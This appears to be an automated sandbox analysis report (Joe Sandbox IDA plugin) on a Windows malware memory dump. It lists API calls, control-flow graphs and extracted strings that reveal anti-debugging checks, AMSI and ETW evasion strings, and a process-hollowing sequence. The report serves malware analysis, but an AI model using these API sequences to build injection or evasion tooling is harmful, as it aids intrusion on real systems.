2e6d2fc 38337 2e4656c 38327->38337 38331 2e6d32a 38342 2e6c35c timeSetEvent 38331->38342 38333 2e6d334 38334 2e6d342 GetMessageA 38333->38334 38335 2e6d336 TranslateMessage DispatchMessageA 38334->38335 38336 2e6d352 38334->38336 38335->38334 38338 2e46577 38337->38338 38343 2e44198 38338->38343 38341 2e442ac SysFreeString SysReAllocStringLen SysAllocStringLen 38341->38331 38342->38333 38344 2e441de 38343->38344 38345 2e44257 38344->38345 38346 2e443e8 38344->38346 38357 2e44130 38345->38357 38349 2e44419 38346->38349 38352 2e4442a 38346->38352 38362 2e4435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38349->38362 38351 2e44423 38351->38352 38353 2e4446f FreeLibrary 38352->38353 38354 2e44493 38352->38354 38353->38352 38355 2e444a2 ExitProcess 38354->38355 38356 2e4449c 38354->38356 38356->38355 38358 2e44173 38357->38358 38359 2e44140 38357->38359 38358->38341 38359->38358 38360 2e415cc VirtualAlloc 38359->38360 38363 2e45868 38359->38363 38360->38359 38362->38351 38364 2e45878 GetModuleFileNameA 38363->38364 38366 2e45894 38363->38366 38367 2e45acc GetModuleFileNameA RegOpenKeyExA 38364->38367 38366->38359 38368 2e45b4f 38367->38368 38369 2e45b0f RegOpenKeyExA 38367->38369 38385 2e45908 12 API calls 38368->38385 38369->38368 38370 2e45b2d RegOpenKeyExA 38369->38370 38370->38368 38372 2e45bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38370->38372 38376 2e45cf2 38372->38376 38377 2e45c0f 38372->38377 38373 2e45b74 RegQueryValueExA 38374 2e45b94 RegQueryValueExA 38373->38374 38375 2e45bb2 RegCloseKey 38373->38375 38374->38375 38375->38366 38376->38366 38377->38376 38379 2e45c1f lstrlenA 38377->38379 38380 2e45c37 38379->38380 38380->38376 38381 2e45c84 38380->38381 38382 2e45c5c lstrcpynA LoadLibraryExA 38380->38382 38381->38376 38383 2e45c8e lstrcpynA LoadLibraryExA 38381->38383 38382->38381 38383->38376 38384 2e45cc0 lstrcpynA LoadLibraryExA 38383->38384 38384->38376 38385->38373
                                                                                                              APIs
                                                                                                              • InetIsOffline.URL(00000000,00000000,02E6B784,?,?,?,00000000,00000000), ref: 02E5F801
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                                • Part of subcall function 02E5F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02E5FAEB,UacInitialize,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize), ref: 02E5F6EE
                                                                                                                • Part of subcall function 02E5F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E5F700
                                                                                                                • Part of subcall function 02E5F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E5F754
                                                                                                                • Part of subcall function 02E5F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E5F766
                                                                                                                • Part of subcall function 02E5F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E5F77D
                                                                                                                • Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67
                                                                                                                • Part of subcall function 02E4C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FBB8B8,?,02E60751,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession), ref: 02E4C37B
                                                                                                                • Part of subcall function 02E5DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDAB
                                                                                                                • Part of subcall function 02E5DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDDB
                                                                                                                • Part of subcall function 02E5DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E5DDF0
                                                                                                                • Part of subcall function 02E5DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E5DE1C
                                                                                                                • Part of subcall function 02E5DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E5DE25
                                                                                                                • Part of subcall function 02E47E80: GetFileAttributesA.KERNEL32(00000000,?,02E6356F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,Initialize), ref: 02E47E8B
                                                                                                                • Part of subcall function 02E48048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E6370D,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8), ref: 02E48055
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                              • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                              • API String ID: 297057983-2644593349
                                                                                                              • Opcode ID: 69c1a52c65da3413937133b24ec658ae0d6449f74940c0c6727dfcc98a2c651c
                                                                                                              • Instruction ID: b1475161bfcf3dcbc93108f032fc18a9c2bc70a08f66034144299ef5c32eeeda
                                                                                                              • Opcode Fuzzy Hash: 69c1a52c65da3413937133b24ec658ae0d6449f74940c0c6727dfcc98a2c651c
                                                                                                              • Instruction Fuzzy Hash: 4A142A74BC015D8BDB11EB64EC85ADE73B6FB85304F60E1E5A508AB654DE30AE82CF41

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 6027 2e58d70-2e58d73 6028 2e58d78-2e58d7d 6027->6028 6028->6028 6029 2e58d7f-2e58e66 call 2e44990 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6028->6029 6060 2e5a8b7-2e5a921 call 2e44500 * 2 call 2e44c60 call 2e44500 call 2e444dc call 2e44500 * 2 6029->6060 6061 2e58e6c-2e58f47 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6029->6061 6061->6060 6105 2e58f4d-2e59275 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e430d4 * 2 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44de0 call 2e44df0 call 2e58788 6061->6105 6214 2e59277-2e592e3 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6105->6214 6215 2e592e8-2e59609 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e42ee0 call 2e42f08 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2e5960f-2e59872 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58400 6215->6323 6396 2e59b7f-2e59bea call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 6323->6396 6397 2e59878-2e599e1 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58670 6323->6397 6423 2e59bf0-2e59d70 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57a2c 6396->6423 6424 2e59beb call 2e589d0 6396->6424 6487 2e599e3-2e59a09 call 2e57a2c 6397->6487 6488 2e59a0b-2e59a76 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 6397->6488 6423->6060 6527 2e59d76-2e59e6f call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58c80 6423->6527 6424->6423 6497 2e59a7c-2e59b73 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57a2c 6487->6497 6488->6497 6528 2e59a77 call 2e589d0 6488->6528 6567 2e59b78-2e59b7d 6497->6567 6579 2e59e71-2e59ebe call 2e58b78 call 2e58b6c 6527->6579 6580 2e59ec3-2e5a61b call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57d78 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57d78 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 SetThreadContext NtResumeThread call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e42c2c call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5894c * 3 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6527->6580 6528->6497 6567->6423 6579->6580 6805 2e5a620-2e5a8b2 call 2e5894c * 2 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c * 5 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e58080 call 2e5894c * 2 6580->6805 6805->6060
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                                • Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814
                                                                                                              • GetThreadContext.KERNEL32(000008A0,02EC7424,ScanString,02EC73A8,02E5A93C,UacInitialize,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,UacInitialize,02EC73A8), ref: 02E59602
                                                                                                                • Part of subcall function 02E58400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471
                                                                                                                • Part of subcall function 02E58670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5
                                                                                                                • Part of subcall function 02E57A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F
                                                                                                                • Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC
                                                                                                              • SetThreadContext.KERNEL32(000008A0,02EC7424,ScanBuffer,02EC73A8,02E5A93C,ScanString,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,0000088C,002E0FF8,02EC74FC,00000004,02EC7500), ref: 02E5A317
                                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02EC7424,ScanBuffer,02EC73A8,02E5A93C,ScanString,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,0000088C,002E0FF8,02EC74FC), ref: 02E5A324
                                                                                                                • Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
                                                                                                                • Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
                                                                                                                • Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                              • API String ID: 2388221946-51457883
                                                                                                              • Opcode ID: fe3e179b36e8b1bcb1f6b2968a64281799ffea315843efd4c4f8f54c741b9327
                                                                                                              • Instruction ID: 70cdd365b531cd7cf10308f48cc2656ab507c634ed5cd2ffbc04620502224028
                                                                                                              • Opcode Fuzzy Hash: fe3e179b36e8b1bcb1f6b2968a64281799ffea315843efd4c4f8f54c741b9327
                                                                                                              • Instruction Fuzzy Hash: 14E2F174B901699BDB11FB64EC81BCE73BAAF85300F60E1B2B505AB254DE309E85CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 6883 2e58d6e-2e58d73 6885 2e58d78-2e58d7d 6883->6885 6885->6885 6886 2e58d7f-2e58e66 call 2e44990 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6885->6886 6917 2e5a8b7-2e5a921 call 2e44500 * 2 call 2e44c60 call 2e44500 call 2e444dc call 2e44500 * 2 6886->6917 6918 2e58e6c-2e58f47 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6886->6918 6918->6917 6962 2e58f4d-2e59275 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e430d4 * 2 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44de0 call 2e44df0 call 2e58788 6918->6962 7071 2e59277-2e592e3 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 6962->7071 7072 2e592e8-2e59609 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e42ee0 call 2e42f08 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2e5960f-2e59872 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58400 7072->7180 7253 2e59b7f-2e59bea call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 7180->7253 7254 2e59878-2e599e1 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58670 7180->7254 7280 2e59bf0-2e59d70 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57a2c 7253->7280 7281 2e59beb call 2e589d0 7253->7281 7344 2e599e3-2e59a09 call 2e57a2c 7254->7344 7345 2e59a0b-2e59a76 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 7254->7345 7280->6917 7384 2e59d76-2e59e6f call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58c80 7280->7384 7281->7280 7354 2e59a7c-2e59b7d call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57a2c 7344->7354 7345->7354 7385 2e59a77 call 2e589d0 7345->7385 7354->7280 7436 2e59e71-2e59ebe call 2e58b78 call 2e58b6c 7384->7436 7437 2e59ec3-2e5a8b2 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57d78 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e57d78 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 SetThreadContext NtResumeThread call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e42c2c call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5894c * 3 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5894c * 2 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c * 5 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e58080 call 2e5894c * 2 7384->7437 7385->7354 7436->7437 7437->6917
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                                • Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814
                                                                                                              • GetThreadContext.KERNEL32(000008A0,02EC7424,ScanString,02EC73A8,02E5A93C,UacInitialize,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,UacInitialize,02EC73A8), ref: 02E59602
                                                                                                                • Part of subcall function 02E58400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471
                                                                                                                • Part of subcall function 02E58670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5
